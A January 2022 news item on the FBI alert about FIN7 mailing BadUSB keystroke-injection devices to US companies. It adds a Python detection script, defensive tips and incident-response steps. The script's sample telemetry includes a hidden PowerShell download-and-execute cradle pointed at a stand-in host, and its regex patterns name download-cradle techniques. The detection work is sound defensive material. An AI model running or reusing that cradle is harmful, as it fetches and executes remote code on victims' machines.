Date: Jan 7, 2022
The US Federal Bureau of Investigation says that FIN7, an infamous cybercrime group that has been linked to the Darkside and BlackMatter ransomware operations, has mailed malicious USB devices to US companies over the past few months in the hope of infecting their systems with malware and staging future attacks.
The FBI has received reports of packages containing these USB devices being sent to US businesses in the transportation, insurance, and defense industries.
The packages were sent using the United States Postal Service and United Parcel Service.
There are two variations of the packages. Those imitating HHS (the US Department of Health and Human Services) are accompanied by a letter referencing COVID-19 guidelines, enclosed with a USB drive; those imitating Amazon arrived in a decorative gift box containing a fraudulent thank-you letter, a counterfeit gift card, and a USB drive. In both cases the packages contained LilyGO-branded USB devices.
The FBI says that if recipients plug the USB thumb drives into their computers, the devices execute a BadUSB attack: the drive registers itself with the operating system as a keyboard rather than as storage and sends a series of preconfigured, automated keystrokes to the user's PC.
Those keystrokes run PowerShell commands that download and install various malware strains, which act as backdoors into the victims' networks. The FBI said it has seen the group use that foothold to obtain administrative access and then move laterally to other systems on the local network.
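The sequence described above (a new keyboard-class device appears, then PowerShell starts with a download cradle a few seconds later) is exactly what endpoint detection should key on. The following Python is added here as an example and is not code from the FBI alert or from the article: it correlates those two events over constructed sample telemetry. The event field names, the 60-second window, the vendor allowlist and the sample device IDs are all assumptions.

```python
"""Correlate a newly attached keyboard-class USB device with a PowerShell
launch shortly afterwards: the footprint a BadUSB keystroke-injection attack
leaves in endpoint logs. Added example; field names are assumptions loosely
modelled on Windows Kernel-PnP event 400 (device configured) and Sysmon
event 1 (process creation)."""

import re
from datetime import datetime

# Seconds after a keyboard appears during which a PowerShell launch is linked
# to it. 60 s is an assumption; injected keystrokes usually fire within a few
# seconds of enumeration.
CORRELATION_WINDOW_S = 60

# Input-device vendor IDs the fleet actually uses (assumption: 046D Logitech,
# 045E Microsoft). A BadUSB device can spoof these, so an unknown VID only
# raises confidence; the timing correlation is the real signal.
APPROVED_VENDOR_IDS = {"046D", "045E"}

HID_DEVICE = re.compile(r"^HID\\VID_([0-9A-F]{4})&PID_([0-9A-F]{4})", re.I)

# Command-line fragments typical of an injected PowerShell download cradle.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no_profile", re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("encoded_command", re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("exec_policy_bypass", re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I)),
    ("invoke_expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("download_cradle", re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer", re.I)),
]

# Constructed sample telemetry, not real logs. WS-0142 gets a device with an
# Arduino-family VID that types a download cradle 3 s after attaching; WS-0077
# gets an ordinary keyboard, an interactive console, and a scheduled script.
SAMPLE_EVENTS = [
    {"time": "2022-01-06T09:14:02", "source": "Kernel-PnP", "event_id": 400, "host": "WS-0142",
     "device": r"HID\VID_2341&PID_8036&MI_00\7&1a2b3c4d&0&0000", "description": "USB Input Device"},
    {"time": "2022-01-06T09:14:05", "source": "Sysmon", "event_id": 1, "host": "WS-0142",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -w hidden -nop -ep bypass -c "
                     "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/u')\""},
    {"time": "2022-01-06T10:02:10", "source": "Kernel-PnP", "event_id": 400, "host": "WS-0077",
     "device": r"HID\VID_046D&PID_C31C&MI_00\8&2b3c4d5e&0&0000", "description": "USB Input Device"},
    {"time": "2022-01-06T10:02:40", "source": "Sysmon", "event_id": 1, "host": "WS-0077",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "powershell.exe"},
    {"time": "2022-01-06T11:30:00", "source": "Sysmon", "event_id": 1, "host": "WS-0077",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
]


def parse_time(stamp):
    return datetime.fromisoformat(stamp)


def is_keyboard_attach(ev):
    """Kernel-PnP 'device configured' for a HID-class device."""
    return (ev.get("source") == "Kernel-PnP" and ev.get("event_id") == 400
            and HID_DEVICE.match(ev.get("device", "")) is not None)


def is_powershell_start(ev):
    """Sysmon process-creation event for powershell.exe or pwsh.exe."""
    image = ev.get("image", "").rsplit("\\", 1)[-1].lower()
    return ev.get("source") == "Sysmon" and ev.get("event_id") == 1 and image in ("powershell.exe", "pwsh.exe")


def matched_indicators(command_line):
    """Names of the suspicious command-line patterns present, in INDICATORS order."""
    return [name for name, rx in INDICATORS if rx.search(command_line)]


def correlate(events, window_s=CORRELATION_WINDOW_S):
    """One alert per (keyboard attach, suspicious PowerShell start) pair on the
    same host where PowerShell started within window_s seconds of the attach."""
    ordered = sorted(events, key=lambda e: parse_time(e["time"]))
    attaches = [e for e in ordered if is_keyboard_attach(e)]
    alerts = []
    for ps in ordered:
        if not is_powershell_start(ps):
            continue
        indicators = matched_indicators(ps.get("command_line", ""))
        if not indicators:
            continue  # a plain interactive console after plugging in a keyboard is normal
        for kb in attaches:
            if kb["host"] != ps["host"]:
                continue
            delay = (parse_time(ps["time"]) - parse_time(kb["time"])).total_seconds()
            if not 0 <= delay <= window_s:
                continue
            vid = HID_DEVICE.match(kb["device"]).group(1).upper()
            alerts.append({
                "host": ps["host"], "device": kb["device"], "vendor_id": vid,
                "vendor_approved": vid in APPROVED_VENDOR_IDS,
                "seconds_after_attach": delay, "parent_image": ps.get("parent_image", ""),
                "indicators": indicators, "command_line": ps["command_line"],
            })
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

On a real Windows endpoint the attach events come from the Kernel-PnP Configuration log and the process starts from Sysmon (or Security event 4688 with command-line auditing enabled); map those fields onto the dictionaries above. Keep the timing correlation as the primary signal: a BadUSB device can present any VID/PID it likes, so the vendor allowlist only adds confidence and must never be relied on to suppress an alert.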
What to do?
Only open or download files from established and trusted sources.
Never plug a USB drive of foreign or unknown origin into any computer system; disabling autorun does not help against a device that presents itself as a keyboard.
Be suspicious of unsolicited letters, packages or emails that you did not request.
Always confirm the sender's address and details before opening or downloading anything.
What can you do when this happens to you?
If you find your network has been compromised, immediately isolate the affected systems from the network (disconnect rather than power off where you can, so that memory and other volatile evidence survive for analysis).
Identify the scope of the breach and the type of virus or malware present.
Identify any data that might have been compromised or stolen, and inform the appropriate parties.
Rebuild the affected systems from a known clean backup, and rotate any credentials the attackers could have captured while they held administrative access.
FBI: FIN7 hackers target US companies with BadUSB devices to install ransomware